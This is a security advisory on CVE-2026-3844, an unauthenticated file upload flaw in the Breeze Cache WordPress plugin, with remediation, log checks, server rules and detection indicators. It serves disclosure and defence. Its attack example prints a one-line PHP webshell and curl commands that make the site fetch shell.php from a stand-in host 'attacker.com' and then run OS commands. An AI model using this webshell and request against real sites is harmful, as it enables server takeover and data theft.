Executive Summary
A critical unauthenticated file upload vulnerability (CVE-2026-3844) has been disclosed in the Breeze Cache plugin for WordPress. The flaw exists in the fetch_gravatar_from_remote function, which downloads and caches user avatar images but fails to validate the file type of the downloaded content.
CVSS Score: 9.8 (Critical)
An unauthenticated attacker can supply a crafted URL to this function, causing Breeze Cache to download and store a malicious PHP file on the web server. Because no authentication is required and no file type validation exists, attackers can upload arbitrary files — including PHP webshells — and then access them directly over HTTP to achieve full remote code execution.
Active exploitation of this vulnerability has been observed in the wild. WordPress site administrators running Breeze Cache versions 2.4.4 and earlier should update immediately.
Vulnerability Overview
| Attribute | Value |
|---|---|
| CVE ID | CVE-2026-3844 |
| CVSS Score | 9.8 (Critical) |
| Type | Arbitrary File Upload |
| Attack Vector | Network |
| Privileges Required | None (unauthenticated) |
| User Interaction | None |
| Confidentiality Impact | High |
| Integrity Impact | High |
| Availability Impact | High |
| Actively Exploited | Yes |
| Patch Available | Yes — update to Breeze Cache 2.4.5+ |
Affected Products
| Product | Affected Versions | Remediation |
|---|---|---|
| Breeze Cache (WordPress Plugin) | All versions up to and including 2.4.4 | Update to the latest version immediately |
Technical Analysis
Root Cause
The vulnerability exists in the fetch_gravatar_from_remote function within the Breeze Cache plugin. This function is designed to download Gravatar (avatar) images from remote URLs and cache them locally to improve page load performance. However, the function:
- Does not validate the Content-Type of the downloaded response
- Does not check the file extension of the remote URL
- Does not inspect the file content (magic bytes) before saving
- Does not restrict the storage path sufficiently to prevent PHP execution
An attacker can supply a URL pointing to attacker-controlled content that returns a PHP file. Breeze Cache fetches the file and saves it to a web-accessible cache directory on the WordPress server with no sanitization.
Attack Flow
1. Attacker identifies a WordPress site running Breeze Cache <= 2.4.4
2. Attacker crafts an HTTP request to trigger the fetch_gravatar_from_remote function
(no authentication required — the endpoint is publicly accessible)
3. Attacker supplies a URL pointing to a remote PHP webshell
4. Breeze Cache downloads the PHP file and saves it to the local cache directory
5. The PHP file is saved with a .php extension in a web-accessible path
6. Attacker accesses the uploaded webshell directly via HTTP
7. The webshell executes with web server user privileges
8. Attacker achieves full OS-level code execution on the WordPress serverExample Webshell Upload
# Attacker hosts a PHP webshell at their server
# shell.php content: <?php system($_GET['cmd']); ?>
# Attacker triggers the vulnerable function (exact endpoint varies)
curl -s "https://victim-site.com/wp-admin/admin-ajax.php" \
-d "action=breeze_fetch_gravatar&url=https://attacker.com/shell.php"
# Webshell is now available at the cache path:
# https://victim-site.com/wp-content/cache/breeze/shell.php
# Attacker executes OS commands
curl "https://victim-site.com/wp-content/cache/breeze/shell.php?cmd=id"Why This Is Dangerous
This vulnerability is particularly severe for several reasons:
- No authentication required — any internet user can trigger the exploit
- Zero interaction — the victim site operator does not need to click anything or visit any URL
- Immediate weaponization — a webshell provides persistent, interactive OS access
- Massive attack surface — Breeze Cache is developed by Cloudways and has hundreds of thousands of active installations on Cloudways-hosted WordPress sites
- Active exploitation — threat actors are already mass-scanning for vulnerable installations
Impact Assessment
| Impact Area | Description |
|---|---|
| Remote Code Execution | PHP webshell execution under the web server user |
| Full WordPress Compromise | Access to wp-config.php, database credentials, all site data |
| Database Access | WordPress database including all user accounts, posts, and settings |
| Lateral Movement | Pivot to other sites on shared hosting; escalate via SUID binaries |
| Ransomware Deployment | Server-level ransomware or defacement |
| SEO Spam | Backdoor used to inject malicious content into WordPress pages |
| Data Theft | Exfiltration of customer data, PII, payment tokens |
| Persistence | Multiple webshells planted; hard to fully remediate without full reinstall |
Immediate Remediation
Step 1: Update Breeze Cache Immediately
# Via WP-CLI (if available)
wp plugin update breeze --allow-root
# Or update via WordPress admin dashboard:
# Plugins > Installed Plugins > Breeze > Update NowStep 2: Scan for Uploaded Webshells
After updating, scan the Breeze Cache directory for PHP files that should not exist there:
# Find PHP files in Breeze cache directory
find /var/www/html/wp-content/cache/breeze/ -name "*.php" -type f
# Scan for common webshell patterns in cache directory
grep -rn "system\|shell_exec\|passthru\|exec\|eval" \
/var/www/html/wp-content/cache/breeze/
# Use a malware scanner
wp package install wp-cli/doctor-command --allow-root
# Or use Wordfence / Sucuri scannerStep 3: Check Web Server Access Logs
# Look for POST requests to the vulnerable endpoint
grep "breeze_fetch_gravatar\|fetch_gravatar" /var/log/nginx/access.log
grep "breeze_fetch_gravatar\|fetch_gravatar" /var/log/apache2/access.log
# Look for access to PHP files in cache directory
grep "wp-content/cache/breeze.*\.php" /var/log/nginx/access.logStep 4: Block PHP Execution in Cache Directories
Add a server configuration to prevent PHP execution in cache directories as a defence-in-depth measure:
# Nginx — block PHP execution in cache directories
location ~* /wp-content/cache/.*\.php$ {
deny all;
return 403;
}# Apache — add to .htaccess in wp-content/cache/
<FilesMatch "\.php$">
Order Deny,Allow
Deny from all
</FilesMatch>Detection Indicators
| Indicator | Description |
|---|---|
| PHP files in Breeze cache directory | Webshell upload artifact |
Requests to breeze_fetch_gravatar from unknown IPs | Exploit trigger |
| Outbound HTTP requests to unfamiliar hosts from web server | Remote URL fetch during attack |
| New PHP files with short, obfuscated content in cache paths | Webshell placement |
| Unusual OS command execution from PHP-FPM or Apache processes | Active webshell usage |
| Large outbound data transfers from web server | Data exfiltration post-exploitation |
Post-Remediation Checklist
- Update Breeze Cache to the latest patched version
- Scan all cache directories for PHP webshells and remove them
- Rotate WordPress database credentials (
DB_PASSWORDinwp-config.php) - Rotate WordPress secret keys and salts
- Review all WordPress admin accounts for unauthorized additions
- Block PHP execution in cache and upload directories at the server level
- Enable a WAF (Cloudflare, Wordfence, or similar) to filter exploit attempts
- Report to your hosting provider if the server has been compromised